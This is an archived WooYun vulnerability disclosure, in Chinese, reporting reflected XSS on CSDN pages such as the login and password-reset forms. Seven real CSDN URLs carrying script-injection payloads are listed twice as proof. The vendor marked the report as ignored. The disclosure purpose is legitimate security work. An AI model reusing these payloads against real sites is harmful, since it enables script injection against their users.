当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074360

漏洞标题:CSDN 多处存在反射型xss

相关厂商:CSDN开发者社区

漏洞作者: 路人甲

提交时间:2014-08-29 17:31

修复时间:2014-09-03 17:32

公开时间:2014-09-03 17:32

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

CSDN 多处存在反射型xss

详细说明:

第一处:http://passport.csdn.net/account/login?from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第二处:http://news.csdn.net/article_preview.html?preview=1&reload=1&arcid=2821118%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第三处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fdownload.csdn.net%2Fmy%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第四处:https://passport.csdn.net/account/fpwd?action=forgotpassword&service=http://www.csdn.net/%20service=http://www.csdn.net/%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第五处:http://special.csdn.net/bdclive/index.html/2?regionid=1455%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第六处:http://passport.csdn.net/account/fpwd?action=forgotpassword&from=http%3A%2F%2Fjob.csdn.net%2Fcsdn%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第七处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fnews.csdn.net%2Farticle%2F2014-08-27%2F2821403-the-top-9-of-ali-bigdata-competition%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

漏洞证明:

第一处:http://passport.csdn.net/account/login?from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第二处:http://news.csdn.net/article_preview.html?preview=1&reload=1&arcid=2821118%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第三处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fdownload.csdn.net%2Fmy%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第四处:https://passport.csdn.net/account/fpwd?action=forgotpassword&service=http://www.csdn.net/%20service=http://www.csdn.net/%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第五处:http://special.csdn.net/bdclive/index.html/2?regionid=1455%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第六处:http://passport.csdn.net/account/fpwd?action=forgotpassword&from=http%3A%2F%2Fjob.csdn.net%2Fcsdn%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第七处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fnews.csdn.net%2Farticle%2F2014-08-27%2F2821403-the-top-9-of-ali-bigdata-competition%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

修复方案:

慢慢过滤(*^__^*)

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-03 17:32

厂商回复:

最新状态:

暂无